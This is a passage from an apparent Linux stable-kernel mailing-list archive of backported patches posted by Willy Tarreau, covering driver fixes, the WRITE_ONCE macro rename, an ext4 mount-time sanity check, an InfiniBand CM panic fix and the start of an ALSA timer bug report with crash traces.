index 4ba3ce0..6f5ffcc 100644
--- a/drivers/media/usb/cx231xx/cx231xx-core.c
+++ b/drivers/media/usb/cx231xx/cx231xx-core.c
@@ -723,6 +723,7 @@ int cx231xx_set_mode(struct cx231xx *dev, enum cx231xx_mode set_mode)
break;
case CX231XX_BOARD_CNXT_RDE_253S:
case CX231XX_BOARD_CNXT_RDU_253S:
+ case CX231XX_BOARD_PV_PLAYTV_USB_HYBRID:
errCode = cx231xx_set_agc_analog_digital_mux_select(dev, 1);
break;
case CX231XX_BOARD_HAUPPAUGE_EXETER:
@@ -747,7 +748,7 @@ int cx231xx_set_mode(struct cx231xx *dev, enum cx231xx_mode set_mode)
case CX231XX_BOARD_PV_PLAYTV_USB_HYBRID:
case CX231XX_BOARD_HAUPPAUGE_USB2_FM_PAL:
case CX231XX_BOARD_HAUPPAUGE_USB2_FM_NTSC:
- errCode = cx231xx_set_agc_analog_digital_mux_select(dev, 0);
+ errCode = cx231xx_set_agc_analog_digital_mux_select(dev, 0);
break;
default:
break;
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:03 UTC
Permalink
From: Christian Borntraeger <***@de.ibm.com>

commit 43239cbe79fc369f5d2160bd7f69e28b5c50a58c upstream.

Feedback has shown that WRITE_ONCE(x, val) is easier to use than
ASSIGN_ONCE(val,x).
There are no in-tree users yet, so lets change it for 3.19.

Signed-off-by: Christian Borntraeger <***@de.ibm.com>
Acked-by: Peter Zijlstra <***@infradead.org>
Acked-by: Davidlohr Bueso <***@stgolabs.net>
Acked-by: Paul E. McKenney <***@linux.vnet.ibm.com>
[wt: backported only for next patch]

Signed-off-by: Willy Tarreau <***@1wt.eu>
---
include/linux/compiler.h | 12 ++++++------
1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/include/linux/compiler.h b/include/linux/compiler.h
index 9df1978..236a4e3 100644
--- a/include/linux/compiler.h
+++ b/include/linux/compiler.h
@@ -208,7 +208,7 @@ static __always_inline void __read_once_size(volatile void *p, void *res, int si
}
}

-static __always_inline void __assign_once_size(volatile void *p, void *res, int size)
+static __always_inline void __write_once_size(volatile void *p, void *res, int size)
{
switch (size) {
case 1: *(volatile __u8 *)p = *(__u8 *)res; break;
@@ -228,15 +228,15 @@ static __always_inline void __assign_once_size(volatile void *p, void *res, int
/*
* Prevent the compiler from merging or refetching reads or writes. The
* compiler is also forbidden from reordering successive instances of
- * READ_ONCE, ASSIGN_ONCE and ACCESS_ONCE (see below), but only when the
+ * READ_ONCE, WRITE_ONCE and ACCESS_ONCE (see below), but only when the
* compiler is aware of some particular ordering. One way to make the
* compiler aware of ordering is to put the two invocations of READ_ONCE,
- * ASSIGN_ONCE or ACCESS_ONCE() in different C statements.
+ * WRITE_ONCE or ACCESS_ONCE() in different C statements.
*
* In contrast to ACCESS_ONCE these two macros will also work on aggregate
* data types like structs or unions. If the size of the accessed data
* type exceeds the word size of the machine (e.g., 32 bits or 64 bits)
- * READ_ONCE() and ASSIGN_ONCE() will fall back to memcpy and print a
+ * READ_ONCE() and WRITE_ONCE() will fall back to memcpy and print a
* compile-time warning.
*
* Their two major use cases are: (1) Mediating communication between
@@ -250,8 +250,8 @@ static __always_inline void __assign_once_size(volatile void *p, void *res, int
#define READ_ONCE(x) \
({ typeof(x) __val; __read_once_size(&x, &__val, sizeof(__val)); __val; })

-#define ASSIGN_ONCE(val, x) \
- ({ typeof(x) __val; __val = val; __assign_once_size(&x, &__val, sizeof(__val)); __val; })
+#define WRITE_ONCE(x, val) \
+ ({ typeof(x) __val; __val = val; __write_once_size(&x, &__val, sizeof(__val)); __val; })

#endif /* __KERNEL__ */
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:03 UTC
Permalink
From: Theodore Ts'o <***@mit.edu>

commit 8cdf3372fe8368f56315e66bea9f35053c418093 upstream.

If the block size or cluster size is insane, reject the mount. This
is important for security reasons (although we shouldn't be just
depending on this check).

Ref: http://www.securityfocus.com/archive/1/539661
Ref: https://bugzilla.redhat.com/show_bug.cgi?id=1332506
Reported-by: Borislav Petkov <***@alien8.de>
Reported-by: Nikolay Borisov <***@kyup.com>
Signed-off-by: Theodore Ts'o <***@mit.edu>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
fs/ext4/ext4.h | 1 +
fs/ext4/super.c | 17 ++++++++++++++++-
2 files changed, 17 insertions(+), 1 deletion(-)

diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
index 046e3e9..f9c938e 100644
--- a/fs/ext4/ext4.h
+++ b/fs/ext4/ext4.h
@@ -246,6 +246,7 @@ struct ext4_io_submit {
#define EXT4_MAX_BLOCK_SIZE 65536
#define EXT4_MIN_BLOCK_LOG_SIZE 10
#define EXT4_MAX_BLOCK_LOG_SIZE 16
+#define EXT4_MAX_CLUSTER_LOG_SIZE 30
#ifdef __KERNEL__
# define EXT4_BLOCK_SIZE(s) ((s)->s_blocksize)
#else
diff --git a/fs/ext4/super.c b/fs/ext4/super.c
index 6cf69fa..faa1920 100644
--- a/fs/ext4/super.c
+++ b/fs/ext4/super.c
@@ -3537,7 +3537,15 @@ static int ext4_fill_super(struct super_block *sb, void *data, int silent)
if (blocksize < EXT4_MIN_BLOCK_SIZE ||
blocksize > EXT4_MAX_BLOCK_SIZE) {
ext4_msg(sb, KERN_ERR,
- "Unsupported filesystem blocksize %d", blocksize);
+ "Unsupported filesystem blocksize %d (%d log_block_size)",
+ blocksize, le32_to_cpu(es->s_log_block_size));
+ goto failed_mount;
+ }
+ if (le32_to_cpu(es->s_log_block_size) >
+ (EXT4_MAX_BLOCK_LOG_SIZE - EXT4_MIN_BLOCK_LOG_SIZE)) {
+ ext4_msg(sb, KERN_ERR,
+ "Invalid log block size: %u",
+ le32_to_cpu(es->s_log_block_size));
goto failed_mount;
}

@@ -3652,6 +3660,13 @@ static int ext4_fill_super(struct super_block *sb, void *data, int silent)
"block size (%d)", clustersize, blocksize);
goto failed_mount;
}
+ if (le32_to_cpu(es->s_log_cluster_size) >
+ (EXT4_MAX_CLUSTER_LOG_SIZE - EXT4_MIN_BLOCK_LOG_SIZE)) {
+ ext4_msg(sb, KERN_ERR,
+ "Invalid log cluster size: %u",
+ le32_to_cpu(es->s_log_cluster_size));
+ goto failed_mount;
+ }
sbi->s_cluster_bits = le32_to_cpu(es->s_log_cluster_size) -
le32_to_cpu(es->s_log_block_size);
sbi->s_clusters_per_group =
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:03 UTC
Permalink
From: Dmitry Torokhov <***@gmail.com>

commit b27c0d0c3bf3073e8ae19875eb1d3755c5e8c072 upstream.

"calibrate" attribute does not provide "show" methods and thus we should
not mark it as readable.

Signed-off-by: Dmitry Torokhov <***@gmail.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/input/touchscreen/ili210x.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/input/touchscreen/ili210x.c b/drivers/input/touchscreen/ili210x.c
index 1418bdd..ceaa790 100644
--- a/drivers/input/touchscreen/ili210x.c
+++ b/drivers/input/touchscreen/ili210x.c
@@ -169,7 +169,7 @@ static ssize_t ili210x_calibrate(struct device *dev,

return count;
}
-static DEVICE_ATTR(calibrate, 0644, NULL, ili210x_calibrate);
+static DEVICE_ATTR(calibrate, S_IWUSR, NULL, ili210x_calibrate);

static struct attribute *ili210x_attributes[] = {
&dev_attr_calibrate.attr,
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:04 UTC
Permalink
From: Dan Carpenter <***@oracle.com>

commit f4693b08cc901912a87369c46537b94ed4084ea0 upstream.

We can't assign -EINVAL to a u16.

Fixes: 3948f0e0c999 ('usb: add Freescale QE/CPM USB peripheral controller driver')
Acked-by: Peter Chen <***@nxp.com>
Signed-off-by: Dan Carpenter <***@oracle.com>
Signed-off-by: Felipe Balbi <***@linux.intel.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/usb/gadget/fsl_qe_udc.c | 7 ++-----
1 file changed, 2 insertions(+), 5 deletions(-)

diff --git a/drivers/usb/gadget/fsl_qe_udc.c b/drivers/usb/gadget/fsl_qe_udc.c
index 9a7ee33..9fd2330 100644
--- a/drivers/usb/gadget/fsl_qe_udc.c
+++ b/drivers/usb/gadget/fsl_qe_udc.c
@@ -1881,11 +1881,8 @@ static int qe_get_frame(struct usb_gadget *gadget)

tmp = in_be16(&udc->usb_param->frame_n);
if (tmp & 0x8000)
- tmp = tmp & 0x07ff;
- else
- tmp = -EINVAL;
-
- return (int)tmp;
+ return tmp & 0x07ff;
+ return -EINVAL;
}

static int fsl_qe_start(struct usb_gadget *gadget,
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:04 UTC
Permalink
From: Mark Bloch <***@mellanox.com>

commit 9db0ff53cb9b43ed75bacd42a89c1a0ab048b2b0 upstream.

When there is a CM id object that has port assigned to it, it means that
the cm-id asked for the specific port that it should go by it, but if
that port was removed (hot-unplug event) the cm-id was not updated.
In order to fix that the port keeps a list of all the cm-id's that are
planning to go by it, whenever the port is removed it marks all of them
as invalid.

This commit fixes a kernel panic which happens when running traffic between
guests and we force reboot a guest mid traffic, it triggers a kernel panic:

Call Trace:
[<ffffffff815271fa>] ? panic+0xa7/0x16f
[<ffffffff8152b534>] ? oops_end+0xe4/0x100
[<ffffffff8104a00b>] ? no_context+0xfb/0x260
[<ffffffff81084db2>] ? del_timer_sync+0x22/0x30
[<ffffffff8104a295>] ? __bad_area_nosemaphore+0x125/0x1e0
[<ffffffff81084240>] ? process_timeout+0x0/0x10
[<ffffffff8104a363>] ? bad_area_nosemaphore+0x13/0x20
[<ffffffff8104aabf>] ? __do_page_fault+0x31f/0x480
[<ffffffff81065df0>] ? default_wake_function+0x0/0x20
[<ffffffffa0752675>] ? free_msg+0x55/0x70 [mlx5_core]
[<ffffffffa0753434>] ? cmd_exec+0x124/0x840 [mlx5_core]
[<ffffffff8105a924>] ? find_busiest_group+0x244/0x9f0
[<ffffffff8152d45e>] ? do_page_fault+0x3e/0xa0
[<ffffffff8152a815>] ? page_fault+0x25/0x30
[<ffffffffa024da25>] ? cm_alloc_msg+0x35/0xc0 [ib_cm]
[<ffffffffa024e821>] ? ib_send_cm_dreq+0xb1/0x1e0 [ib_cm]
[<ffffffffa024f836>] ? cm_destroy_id+0x176/0x320 [ib_cm]
[<ffffffffa024fb00>] ? ib_destroy_cm_id+0x10/0x20 [ib_cm]
[<ffffffffa034f527>] ? ipoib_cm_free_rx_reap_list+0xa7/0x110 [ib_ipoib]
[<ffffffffa034f590>] ? ipoib_cm_rx_reap+0x0/0x20 [ib_ipoib]
[<ffffffffa034f5a5>] ? ipoib_cm_rx_reap+0x15/0x20 [ib_ipoib]
[<ffffffff81094d20>] ? worker_thread+0x170/0x2a0
[<ffffffff8109b2a0>] ? autoremove_wake_function+0x0/0x40
[<ffffffff81094bb0>] ? worker_thread+0x0/0x2a0
[<ffffffff8109aef6>] ? kthread+0x96/0xa0
[<ffffffff8100c20a>] ? child_rip+0xa/0x20
[<ffffffff8109ae60>] ? kthread+0x0/0xa0
[<ffffffff8100c200>] ? child_rip+0x0/0x20

Fixes: a977049dacde ("[PATCH] IB: Add the kernel CM implementation")
Signed-off-by: Mark Bloch <***@mellanox.com>
Signed-off-by: Erez Shitrit <***@mellanox.com>
Reviewed-by: Maor Gottlieb <***@mellanox.com>
Signed-off-by: Leon Romanovsky <***@kernel.org>
Signed-off-by: Doug Ledford <***@redhat.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/infiniband/core/cm.c | 127 +++++++++++++++++++++++++++++++++++++------
1 file changed, 111 insertions(+), 16 deletions(-)

diff --git a/drivers/infiniband/core/cm.c b/drivers/infiniband/core/cm.c
index c410217..951a4f6 100644
--- a/drivers/infiniband/core/cm.c
+++ b/drivers/infiniband/core/cm.c
@@ -79,6 +79,8 @@ static struct ib_cm {
__be32 random_id_operand;
struct list_head timewait_list;
struct workqueue_struct *wq;
+ /* Sync on cm change port state */
+ spinlock_t state_lock;
} cm;

/* Counter indexes ordered by attribute ID */
@@ -160,6 +162,8 @@ struct cm_port {
struct ib_mad_agent *mad_agent;
struct kobject port_obj;
u8 port_num;
+ struct list_head cm_priv_prim_list;
+ struct list_head cm_priv_altr_list;
struct cm_counter_group counter_group[CM_COUNTER_GROUPS];
};

@@ -237,6 +241,12 @@ struct cm_id_private {
u8 service_timeout;
u8 target_ack_delay;

+ struct list_head prim_list;
+ struct list_head altr_list;
+ /* Indicates that the send port mad is registered and av is set */
+ int prim_send_port_not_ready;
+ int altr_send_port_not_ready;
+
struct list_head work_list;
atomic_t work_count;
};
@@ -255,19 +265,46 @@ static int cm_alloc_msg(struct cm_id_private *cm_id_priv,
struct ib_mad_agent *mad_agent;
struct ib_mad_send_buf *m;
struct ib_ah *ah;
+ struct cm_av *av;
+ unsigned long flags, flags2;
+ int ret = 0;

+ /* don't let the port to be released till the agent is down */
+ spin_lock_irqsave(&cm.state_lock, flags2);
+ spin_lock_irqsave(&cm.lock, flags);
+ if (!cm_id_priv->prim_send_port_not_ready)
+ av = &cm_id_priv->av;
+ else if (!cm_id_priv->altr_send_port_not_ready &&
+ (cm_id_priv->alt_av.port))
+ av = &cm_id_priv->alt_av;
+ else {
+ pr_info("%s: not valid CM id\n", __func__);
+ ret = -ENODEV;
+ spin_unlock_irqrestore(&cm.lock, flags);
+ goto out;
+ }
+ spin_unlock_irqrestore(&cm.lock, flags);
+ /* Make sure the port haven't released the mad yet */
mad_agent = cm_id_priv->av.port->mad_agent;
- ah = ib_create_ah(mad_agent->qp->pd, &cm_id_priv->av.ah_attr);
- if (IS_ERR(ah))
- return PTR_ERR(ah);
+ if (!mad_agent) {
+ pr_info("%s: not a valid MAD agent\n", __func__);
+ ret = -ENODEV;
+ goto out;
+ }
+ ah = ib_create_ah(mad_agent->qp->pd, &av->ah_attr);
+ if (IS_ERR(ah)) {
+ ret = PTR_ERR(ah);
+ goto out;
+ }

m = ib_create_send_mad(mad_agent, cm_id_priv->id.remote_cm_qpn,
- cm_id_priv->av.pkey_index,
+ av->pkey_index,
0, IB_MGMT_MAD_HDR, IB_MGMT_MAD_DATA,
GFP_ATOMIC);
if (IS_ERR(m)) {
ib_destroy_ah(ah);
- return PTR_ERR(m);
+ ret = PTR_ERR(m);
+ goto out;
}

/* Timeout set by caller if response is expected. */
@@ -277,7 +314,10 @@ static int cm_alloc_msg(struct cm_id_private *cm_id_priv,
atomic_inc(&cm_id_priv->refcount);
m->context[0] = cm_id_priv;
*msg = m;
- return 0;
+
+out:
+ spin_unlock_irqrestore(&cm.state_lock, flags2);
+ return ret;
}

static int cm_alloc_response_msg(struct cm_port *port,
@@ -346,7 +386,8 @@ static void cm_init_av_for_response(struct cm_port *port, struct ib_wc *wc,
grh, &av->ah_attr);
}

-static int cm_init_av_by_path(struct ib_sa_path_rec *path, struct cm_av *av)
+static int cm_init_av_by_path(struct ib_sa_path_rec *path, struct cm_av *av,
+ struct cm_id_private *cm_id_priv)
{
struct cm_device *cm_dev;
struct cm_port *port = NULL;
@@ -376,7 +417,18 @@ static int cm_init_av_by_path(struct ib_sa_path_rec *path, struct cm_av *av)
ib_init_ah_from_path(cm_dev->ib_device, port->port_num, path,
&av->ah_attr);
av->timeout = path->packet_life_time + 1;
- return 0;
+
+ spin_lock_irqsave(&cm.lock, flags);
+ if (&cm_id_priv->av == av)
+ list_add_tail(&cm_id_priv->prim_list, &port->cm_priv_prim_list);
+ else if (&cm_id_priv->alt_av == av)
+ list_add_tail(&cm_id_priv->altr_list, &port->cm_priv_altr_list);
+ else
+ ret = -EINVAL;
+
+ spin_unlock_irqrestore(&cm.lock, flags);
+
+ return ret;
}

static int cm_alloc_id(struct cm_id_private *cm_id_priv)
@@ -716,6 +768,8 @@ struct ib_cm_id *ib_create_cm_id(struct ib_device *device,
spin_lock_init(&cm_id_priv->lock);
init_completion(&cm_id_priv->comp);
INIT_LIST_HEAD(&cm_id_priv->work_list);
+ INIT_LIST_HEAD(&cm_id_priv->prim_list);
+ INIT_LIST_HEAD(&cm_id_priv->altr_list);
atomic_set(&cm_id_priv->work_count, -1);
atomic_set(&cm_id_priv->refcount, 1);
return &cm_id_priv->id;
@@ -914,6 +968,15 @@ retest:
break;
}

+ spin_lock_irq(&cm.lock);
+ if (!list_empty(&cm_id_priv->altr_list) &&
+ (!cm_id_priv->altr_send_port_not_ready))
+ list_del(&cm_id_priv->altr_list);
+ if (!list_empty(&cm_id_priv->prim_list) &&
+ (!cm_id_priv->prim_send_port_not_ready))
+ list_del(&cm_id_priv->prim_list);
+ spin_unlock_irq(&cm.lock);
+
cm_free_id(cm_id->local_id);
cm_deref_id(cm_id_priv);
wait_for_completion(&cm_id_priv->comp);
@@ -1137,12 +1200,13 @@ int ib_send_cm_req(struct ib_cm_id *cm_id,
goto out;
}

- ret = cm_init_av_by_path(param->primary_path, &cm_id_priv->av);
+ ret = cm_init_av_by_path(param->primary_path, &cm_id_priv->av,
+ cm_id_priv);
if (ret)
goto error1;
if (param->alternate_path) {
ret = cm_init_av_by_path(param->alternate_path,
- &cm_id_priv->alt_av);
+ &cm_id_priv->alt_av, cm_id_priv);
if (ret)
goto error1;
}
@@ -1562,7 +1626,8 @@ static int cm_req_handler(struct cm_work *work)

cm_process_routed_req(req_msg, work->mad_recv_wc->wc);
cm_format_paths_from_req(req_msg, &work->path[0], &work->path[1]);
- ret = cm_init_av_by_path(&work->path[0], &cm_id_priv->av);
+ ret = cm_init_av_by_path(&work->path[0], &cm_id_priv->av,
+ cm_id_priv);
if (ret) {
ib_get_cached_gid(work->port->cm_dev->ib_device,
work->port->port_num, 0, &work->path[0].sgid);
@@ -1572,7 +1637,8 @@ static int cm_req_handler(struct cm_work *work)
goto rejected;
}
if (req_msg->alt_local_lid) {
- ret = cm_init_av_by_path(&work->path[1], &cm_id_priv->alt_av);
+ ret = cm_init_av_by_path(&work->path[1], &cm_id_priv->alt_av,
+ cm_id_priv);
if (ret) {
ib_send_cm_rej(cm_id, IB_CM_REJ_INVALID_ALT_GID,
&work->path[0].sgid,
@@ -2627,7 +2693,8 @@ int ib_send_cm_lap(struct ib_cm_id *cm_id,
goto out;
}

- ret = cm_init_av_by_path(alternate_path, &cm_id_priv->alt_av);
+ ret = cm_init_av_by_path(alternate_path, &cm_id_priv->alt_av,
+ cm_id_priv);
if (ret)
goto out;
cm_id_priv->alt_av.timeout =
@@ -2739,7 +2806,8 @@ static int cm_lap_handler(struct cm_work *work)
cm_init_av_for_response(work->port, work->mad_recv_wc->wc,
work->mad_recv_wc->recv_buf.grh,
&cm_id_priv->av);
- cm_init_av_by_path(param->alternate_path, &cm_id_priv->alt_av);
+ cm_init_av_by_path(param->alternate_path, &cm_id_priv->alt_av,
+ cm_id_priv);
ret = atomic_inc_and_test(&cm_id_priv->work_count);
if (!ret)
list_add_tail(&work->list, &cm_id_priv->work_list);
@@ -2931,7 +2999,7 @@ int ib_send_cm_sidr_req(struct ib_cm_id *cm_id,
return -EINVAL;

cm_id_priv = container_of(cm_id, struct cm_id_private, id);
- ret = cm_init_av_by_path(param->path, &cm_id_priv->av);
+ ret = cm_init_av_by_path(param->path, &cm_id_priv->av, cm_id_priv);
if (ret)
goto out;

@@ -3352,7 +3420,9 @@ out:
static int cm_migrate(struct ib_cm_id *cm_id)
{
struct cm_id_private *cm_id_priv;
+ struct cm_av tmp_av;
unsigned long flags;
+ int tmp_send_port_not_ready;
int ret = 0;

cm_id_priv = container_of(cm_id, struct cm_id_private, id);
@@ -3361,7 +3431,14 @@ static int cm_migrate(struct ib_cm_id *cm_id)
(cm_id->lap_state == IB_CM_LAP_UNINIT ||
cm_id->lap_state == IB_CM_LAP_IDLE)) {
cm_id->lap_state = IB_CM_LAP_IDLE;
+ /* Swap address vector */
+ tmp_av = cm_id_priv->av;
cm_id_priv->av = cm_id_priv->alt_av;
+ cm_id_priv->alt_av = tmp_av;
+ /* Swap port send ready state */
+ tmp_send_port_not_ready = cm_id_priv->prim_send_port_not_ready;
+ cm_id_priv->prim_send_port_not_ready = cm_id_priv->altr_send_port_not_ready;
+ cm_id_priv->altr_send_port_not_ready = tmp_send_port_not_ready;
} else
ret = -EINVAL;
spin_unlock_irqrestore(&cm_id_priv->lock, flags);
@@ -3767,6 +3844,9 @@ static void cm_add_one(struct ib_device *ib_device)
port->cm_dev = cm_dev;
port->port_num = i;

+ INIT_LIST_HEAD(&port->cm_priv_prim_list);
+ INIT_LIST_HEAD(&port->cm_priv_altr_list);
+
ret = cm_create_port_fs(port);
if (ret)
goto error1;
@@ -3813,6 +3893,8 @@ static void cm_remove_one(struct ib_device *ib_device)
{
struct cm_device *cm_dev;
struct cm_port *port;
+ struct cm_id_private *cm_id_priv;
+ struct ib_mad_agent *cur_mad_agent;
struct ib_port_modify port_modify = {
.clr_port_cap_mask = IB_PORT_CM_SUP
};
@@ -3830,10 +3912,22 @@ static void cm_remove_one(struct ib_device *ib_device)
for (i = 1; i <= ib_device->phys_port_cnt; i++) {
port = cm_dev->port[i-1];
ib_modify_port(ib_device, port->port_num, 0, &port_modify);
- ib_unregister_mad_agent(port->mad_agent);
+ /* Mark all the cm_id's as not valid */
+ spin_lock_irq(&cm.lock);
+ list_for_each_entry(cm_id_priv, &port->cm_priv_altr_list, altr_list)
+ cm_id_priv->altr_send_port_not_ready = 1;
+ list_for_each_entry(cm_id_priv, &port->cm_priv_prim_list, prim_list)
+ cm_id_priv->prim_send_port_not_ready = 1;
+ spin_unlock_irq(&cm.lock);
flush_workqueue(cm.wq);
+ spin_lock_irq(&cm.state_lock);
+ cur_mad_agent = port->mad_agent;
+ port->mad_agent = NULL;
+ spin_unlock_irq(&cm.state_lock);
+ ib_unregister_mad_agent(cur_mad_agent);
cm_remove_port_fs(port);
}
+
device_unregister(cm_dev->device);
kfree(cm_dev);
}
@@ -3846,6 +3940,7 @@ static int __init ib_cm_init(void)
INIT_LIST_HEAD(&cm.device_list);
rwlock_init(&cm.device_lock);
spin_lock_init(&cm.lock);
+ spin_lock_init(&cm.state_lock);
cm.listen_service_table = RB_ROOT;
cm.listen_service_id = be64_to_cpu(IB_CM_ASSIGN_SERVICE_ID);
cm.remote_id_table = RB_ROOT;
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:04 UTC
Permalink
From: Michel Dänzer <***@daenzer.net>

NOTE: This patch only applies to 4.5.y or older kernels. With newer
kernels, this problem cannot happen because the driver now uses
drm_crtc_vblank_on/off instead of drm_vblank_pre/post_modeset[0]. I
consider this patch safer for older kernels than backporting the API
change, because drm_crtc_vblank_on/off had various issues in older
kernels, and I'm not sure all fixes for those have been backported to
all stable branches where this patch could be applied.

---------------------

Fixes the vblank interrupt being disabled when it should be on, which
can cause at least the following symptoms:

* Hangs when running 'xset dpms force off' in a GNOME session with
gnome-shell using DRI2.
* RandR 1.4 slave outputs freezing with garbage displayed using
xf86-video-ati 7.8.0 or newer.

[0] See upstream commit:

commit 777e3cbc791f131806d9bf24b3325637c7fc228d
Author: Daniel Vetter <***@ffwll.ch>
Date: Thu Jan 21 11:08:57 2016 +0100

drm/radeon: Switch to drm_vblank_on/off

Reported-and-Tested-by: Max Staudt <***@suse.de>
Reviewed-by: Daniel Vetter <***@ffwll.ch>
Reviewed-by: Alex Deucher <***@amd.com>
Signed-off-by: Michel Dänzer <***@amd.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/gpu/drm/radeon/atombios_crtc.c | 2 ++
drivers/gpu/drm/radeon/radeon_legacy_crtc.c | 2 ++
2 files changed, 4 insertions(+)

diff --git a/drivers/gpu/drm/radeon/atombios_crtc.c b/drivers/gpu/drm/radeon/atombios_crtc.c
index 8ac3330..4d09582 100644
--- a/drivers/gpu/drm/radeon/atombios_crtc.c
+++ b/drivers/gpu/drm/radeon/atombios_crtc.c
@@ -257,6 +257,8 @@ void atombios_crtc_dpms(struct drm_crtc *crtc, int mode)
atombios_enable_crtc_memreq(crtc, ATOM_ENABLE);
atombios_blank_crtc(crtc, ATOM_DISABLE);
drm_vblank_post_modeset(dev, radeon_crtc->crtc_id);
+ /* Make sure vblank interrupt is still enabled if needed */
+ radeon_irq_set(rdev);
radeon_crtc_load_lut(crtc);
break;
case DRM_MODE_DPMS_STANDBY:
diff --git a/drivers/gpu/drm/radeon/radeon_legacy_crtc.c b/drivers/gpu/drm/radeon/radeon_legacy_crtc.c
index bc73021..ae0d7b1 100644
--- a/drivers/gpu/drm/radeon/radeon_legacy_crtc.c
+++ b/drivers/gpu/drm/radeon/radeon_legacy_crtc.c
@@ -331,6 +331,8 @@ static void radeon_crtc_dpms(struct drm_crtc *crtc, int mode)
WREG32_P(RADEON_CRTC_EXT_CNTL, crtc_ext_cntl, ~(mask | crtc_ext_cntl));
}
drm_vblank_post_modeset(dev, radeon_crtc->crtc_id);
+ /* Make sure vblank interrupt is still enabled if needed */
+ radeon_irq_set(rdev);
radeon_crtc_load_lut(crtc);
break;
case DRM_MODE_DPMS_STANDBY:
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:04 UTC
Permalink
From: Arnd Bergmann <***@arndb.de>

commit 34eee70a7b82b09dbda4cb453e0e21d460dae226 upstream.

The ad5933_i2c_read function returns an error code to indicate
whether it could read data or not. However ad5933_work() ignores
this return code and just accesses the data unconditionally,
which gets detected by gcc as a possible bug:

drivers/staging/iio/impedance-analyzer/ad5933.c: In function 'ad5933_work':
drivers/staging/iio/impedance-analyzer/ad5933.c:649:16: warning: 'status' may be used uninitialized in this function [-Wmaybe-uninitialized]

This adds minimal error handling so we only evaluate the
data if it was correctly read.

Link: https://patchwork.kernel.org/patch/8110281/
Signed-off-by: Arnd Bergmann <***@arndb.de>
Acked-by: Lars-Peter Clausen <***@metafoo.de>
Signed-off-by: Jonathan Cameron <***@kernel.org>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/staging/iio/impedance-analyzer/ad5933.c | 17 ++++++++++-------
1 file changed, 10 insertions(+), 7 deletions(-)

diff --git a/drivers/staging/iio/impedance-analyzer/ad5933.c b/drivers/staging/iio/impedance-analyzer/ad5933.c
index bc23d66..1ff1735 100644
--- a/drivers/staging/iio/impedance-analyzer/ad5933.c
+++ b/drivers/staging/iio/impedance-analyzer/ad5933.c
@@ -646,6 +646,7 @@ static void ad5933_work(struct work_struct *work)
struct iio_dev *indio_dev = i2c_get_clientdata(st->client);
signed short buf[2];
unsigned char status;
+ int ret;

mutex_lock(&indio_dev->mlock);
if (st->state == AD5933_CTRL_INIT_START_FREQ) {
@@ -653,19 +654,22 @@ static void ad5933_work(struct work_struct *work)
ad5933_cmd(st, AD5933_CTRL_START_SWEEP);
st->state = AD5933_CTRL_START_SWEEP;
schedule_delayed_work(&st->work, st->poll_time_jiffies);
- mutex_unlock(&indio_dev->mlock);
- return;
+ goto out;
}

- ad5933_i2c_read(st->client, AD5933_REG_STATUS, 1, &status);
+ ret = ad5933_i2c_read(st->client, AD5933_REG_STATUS, 1, &status);
+ if (ret)
+ goto out;

if (status & AD5933_STAT_DATA_VALID) {
int scan_count = bitmap_weight(indio_dev->active_scan_mask,
indio_dev->masklength);
- ad5933_i2c_read(st->client,
+ ret = ad5933_i2c_read(st->client,
test_bit(1, indio_dev->active_scan_mask) ?
AD5933_REG_REAL_DATA : AD5933_REG_IMAG_DATA,
scan_count * 2, (u8 *)buf);
+ if (ret)
+ goto out;

if (scan_count == 2) {
buf[0] = be16_to_cpu(buf[0]);
@@ -677,8 +681,7 @@ static void ad5933_work(struct work_struct *work)
} else {
/* no data available - try again later */
schedule_delayed_work(&st->work, st->poll_time_jiffies);
- mutex_unlock(&indio_dev->mlock);
- return;
+ goto out;
}

if (status & AD5933_STAT_SWEEP_DONE) {
@@ -690,7 +693,7 @@ static void ad5933_work(struct work_struct *work)
ad5933_cmd(st, AD5933_CTRL_INC_FREQ);
schedule_delayed_work(&st->work, st->poll_time_jiffies);
}
-
+out:
mutex_unlock(&indio_dev->mlock);
}
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:30:04 UTC
Permalink
From: Vegard Nossum <***@oracle.com>

commit 11749e086b2766cccf6217a527ef5c5604ba069c upstream.

I got this with syzkaller:

==================================================================
BUG: KASAN: null-ptr-deref on address 0000000000000020
Read of size 32 by task syz-executor/22519
CPU: 1 PID: 22519 Comm: syz-executor Not tainted 4.8.0-rc2+ #169
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org 04/01/2
014
0000000000000001 ffff880111a17a00 ffffffff81f9f141 ffff880111a17a90
ffff880111a17c50 ffff880114584a58 ffff880114584a10 ffff880111a17a80
ffffffff8161fe3f ffff880100000000 ffff880118d74a48 ffff880118d74a68
Call Trace:
[<ffffffff81f9f141>] dump_stack+0x83/0xb2
[<ffffffff8161fe3f>] kasan_report_error+0x41f/0x4c0
[<ffffffff8161ff74>] kasan_report+0x34/0x40
[<ffffffff82c84b54>] ? snd_timer_user_read+0x554/0x790
[<ffffffff8161e79e>] check_memory_region+0x13e/0x1a0
[<ffffffff8161e9c1>] kasan_check_read+0x11/0x20
[<ffffffff82c84b54>] snd_timer_user_read+0x554/0x790
[<ffffffff82c84600>] ? snd_timer_user_info_compat.isra.5+0x2b0/0x2b0
[<ffffffff817d0831>] ? proc_fault_inject_write+0x1c1/0x250
[<ffffffff817d0670>] ? next_tgid+0x2a0/0x2a0
[<ffffffff8127c278>] ? do_group_exit+0x108/0x330
[<ffffffff8174653a>] ? fsnotify+0x72a/0xca0
